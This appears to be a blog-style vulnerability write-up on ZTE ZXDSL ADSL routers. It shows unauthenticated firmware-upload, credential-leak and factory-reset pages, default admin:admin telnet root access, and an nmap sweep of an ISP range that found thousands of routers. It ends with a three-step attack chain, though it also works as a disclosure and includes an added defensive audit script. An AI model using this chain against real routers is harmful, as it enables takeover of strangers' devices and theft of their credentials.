ZTE provides the ADSL routers in my home country. Since there is only one ISP and it hands everyone a ZTE router when they get ADSL internet, I thought looking into this would be interesting. Even though different router models are given out, I was surprised to find how similarly the software operated. After testing about 7 different ZXDSL models, I think all of these bugs are present in all ZTE ZXDSL routers.
Here is how it started: I got a new DSL internet modem (ZTE ZXDSL 831 II) and after some use I forgot my password. I couldn't connect to the internet, nor could I simply go to 192.168.1.1 and change my credentials (it used HTTP Basic Auth to authenticate, so bruteforce was an option...), but I took it as a challenge and tried to get inside without brute-forcing. So I downloaded the firmware...
It quickly turned out that not only was I able to hack it and root it, it was also very easy to hack all the people around me (people using broadband in the country, if you know the IP range ;O -- thanks to there being only one ISP and one router it uses by default) and then write about it.
Since I wasn't able to find a direct way to access the modem using the IP, I started requesting some of the pages you encounter after auth... and it turns out most of those files were returned to me without a 401 Unauthorized error (unlike the login page), which is obviously an Insecure Direct Object Reference vulnerability. I quickly realized ZTE router programmers really don't know what IDOR bugs are; almost all ZTE routers I tested after this had similar IDOR bugs letting me bypass authentication if I know the name of the page.
Note that the modem comes with admin:admin credentials, which is enough info to pwn people using the known IP range. But for those that change their default ssh/telnet and http logins, we need a different bug.
IDOR 1: Allows Root RCE
Requesting http://<router-IP>/upload.cgi didn't throw a 401 error; it just gives the upload page. Insecure Direct Object Reference, awesome! Here we can upload a new firmware for the router. We can add a malicious binary/shell to the squashfs file of the firmware and upload it, granting us persistent root access.
IDOR 2: Information Disclosure
Another bug I found was awesome: requesting http://<router-IP>/pppoe.cgi would reveal the PPPoE password and username when you view source. Ouch!
If an attacker who is NOT authenticated requests http://<router-IP>/resetrouter.cgi, the router resets all settings to factory mode without any confirmation or warning.
So the root password for ssh and the HTTP interface become admin:admin again, yay!
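All three bugs above are the same defect: a page that should sit behind the HTTP Basic Auth prompt is served with a 200 instead of a 401. A quick way to check your own router for this pattern is to request each post-auth page without credentials and see what status comes back. The script below is an added example, not code from the original post; it assumes the router speaks plain HTTP on its LAN address and uses the page names mentioned above. It deliberately never touches resetrouter.cgi, since merely requesting that page wipes the device.

```python
"""Audit a router's HTTP interface for post-auth pages served without a 401.

Added example (not from the original post). Assumes HTTP Basic Auth and the
page names the post mentions. resetrouter.cgi is intentionally excluded:
requesting it resets the router to factory settings.
"""
import urllib.error
import urllib.request

# Pages that should only be reachable after authentication.
PROTECTED_PAGES = ["upload.cgi", "pppoe.cgi", "menu_status.html"]


def http_status(url, timeout=5):
    """Return the HTTP status for an unauthenticated GET, or None if unreachable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:  # 401/404 etc. arrive as exceptions
        return err.code
    except urllib.error.URLError:  # refused / timed out
        return None


def audit_idor(base_url, pages=PROTECTED_PAGES, fetch=http_status):
    """Map each page to its status and whether it is exposed (200 without auth).

    `fetch` is injectable so the logic can be exercised offline.
    """
    base = base_url.rstrip("/")
    results = {}
    for page in pages:
        status = fetch(f"{base}/{page}")
        results[page] = {"status": status, "exposed": status == 200}
    return results


def exposed_pages(results):
    """Return the sorted list of pages the router serves without authentication."""
    return sorted(page for page, r in results.items() if r["exposed"])


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1"
    report = audit_idor(target)
    for page, r in report.items():
        verdict = "EXPOSED" if r["exposed"] else "ok"
        print(f"{page}: HTTP {r['status']} {verdict}")
    if exposed_pages(report):
        print("Authenticated pages are served without a 401; keep the web UI off the WAN side.")
```

Run it against your own router's LAN address (`python audit.py http://192.168.1.1`). Any page reported as EXPOSED is a page an unauthenticated client can fetch, which for upload.cgi and pppoe.cgi means exactly the firmware-upload and credential-leak issues described above.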
When I port scanned it using nmap -sV 192.168.1.1, it returned
...
23/tcp open telnet ZXDSL 831CII ADSL modem telnetd 5.2.0a_E29_ET
...
While SSH is disabled by default, it looks like telnet isn't, and the default username and password work. After telnetting in we are greeted with a terrible shell, but if you type "sh" you are suddenly in a BusyBox shell.
# cat /proc/cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 239.20
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
unaligned access : 1289794
VCED exceptions : not available
VCEI exceptions : not available
Dead performance!
So I ran "cat /proc/meminfo" (it holds 6MB), then "cat /proc/version", which returned
...
Linux version 2.6.8.1 (root@host.domain.com)
...
Even though there was a public local exploit for that kernel, simply typing "echo $USER" revealed I was already root. No need to root shit. Simple as that.
Going to http://192.168.1.1/menu_status.html gives the public IP address of the router without auth (aside from lots of easier ways); it was 10.136.0.16 (obviously not the real IP).
So let's scan my IP range to see what we find: "nmap --open -sS -sV -T4 10.136.*.*/24 -p 80 -oG - | grep 'open'"
and quickly found at least 4800 other routers online. You know it's ez:
1. Attacker goes to https://<router-ip>/resetrouter.cgi
2. telnet <router-ip> admin:admin
3. pwn!
Well, that was a fun recovery time!
Happy Hacking!
Edit: btw I contacted ZTE and they said they will make better routers in the future, and will not be releasing patches for these models.
Conclusion: ZTE makes bad routers; most "different models" run the same services with similar holes. They weren't built with security in mind. Run if you see one! Don't buy it! Sue me!
And yeah, disable remote logins to telnet, http etc. ;)